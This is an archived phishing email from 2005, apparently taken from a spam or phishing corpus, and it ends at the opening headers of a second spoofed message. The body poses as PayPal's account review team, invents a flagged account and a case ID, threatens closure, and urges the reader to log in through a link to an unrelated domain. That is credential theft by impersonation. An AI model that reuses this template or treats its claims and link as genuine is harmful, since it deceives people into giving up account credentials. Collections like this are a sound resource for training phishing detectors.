From: 	security@paypal.com <security@paypal.com>
Content-Type: 	text/html
Message-Id: 	<20050701202810.43BE4316C9@clust07-www01.powweb.com>
Date: 	Fri, 1 Jul 2005 13:28:10 -0700 (PDT)
X-Greylist: 	Delayed for 00:30:37 by milter-greylist-1.5.6
(sasami.jurai.net [69.17.104.113]); Fri, 01 Jul 2005 16:58:54 -0400 (EDT)
X-Spam-Status: 	No, score=2.1 required=4.1
tests=HTML_20_30,HTML_MESSAGE, MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY
autolearn=no version=3.0.4
X-Spam-Level: 	**
X-Spam-Checker-Version: 	SpamAssassin 3.0.4 (2005-06-05) on mail.angelar.com



Dear PayPal Member,

PayPal is committed to maintaining a safe environment for its community
of buyers and sellers. To protect the security of your account, PayPal
employs some of the most advanced security systems in the world and our
anti-fraud teams regularly screen the PayPal system for unusual activity.

Recently, our Account Review Team identified some unusual activity in
your account. In accordance with PayPal's User Agreement and to ensure
that your account has not been compromised, access to your account was
flagged. Your account will remain flagged until this issue has been
resolved. This is a fraud prevention measure meant to ensure that your
account is not compromised.

In order to secure your account and quickly restore full access, we may
require some specific information from you for the following reason:

Our system requires further account verification.

Case ID Number: PP-056-245-481 We encourage you to log in and restore
full access as soon as possible. Should your account remain flagged for
an extended period of time, it may result in further limitations on the
use of your account or may result in eventual account closure.

-------------------------------------------------------------

Please click on the link below to log in and restore full access to your
account.

Click here to activate your account
<http://fox.netfield.se/manual/paypal/error.html>

-------------------------------------------------------------

Thank you for your prompt attention to this matter. Please understand
that this is a security measure meant to help protect you and your
account. We apologize for any inconvenience.

Sincerely,

PayPal Account Review Department

PayPal Email ID PP562

From support@ncua.gov  Fri Jul  1 17:19:44 2005
Return-Path: <support@ncua.gov>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 8BB80536E13
	for <jose@login.monkey.org>; Fri,  1 Jul 2005 17:19:44 -0400 (EDT)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail1.monkey.org (Postfix) with ESMTP id F3D2685AC77
	for <jose@monkey.org>; Fri,  1 Jul 2005 17:19:42 -0400 (EDT)
Received: by lujan.uninet.edu (Postfix)
	id E9DCA1BC3E; Fri,  1 Jul 2005 23:19:48 +0200 (CEST)
Delivered-To: umeet@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 60F201BBF4; Fri,  1 Jul 2005 21:19:48 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 20476-10; Fri, 1 Jul 2005 23:19:37 +0200 (CEST)
Received: from 62.193.212.129 (vds-355367.amen-pro.com [62.193.212.129])
	by lujan.uninet.edu (Postfix) with SMTP
	id 29DE21BB1E; Fri,  1 Jul 2005 23:19:36 +0200 (CEST)
Received: from 255.148.197.0 by ; Fri, 01 Jul 2005 23:14:22 +0100
Message-ID: <COQLVBMBPQQJZVWZULTY@hotmail.com>
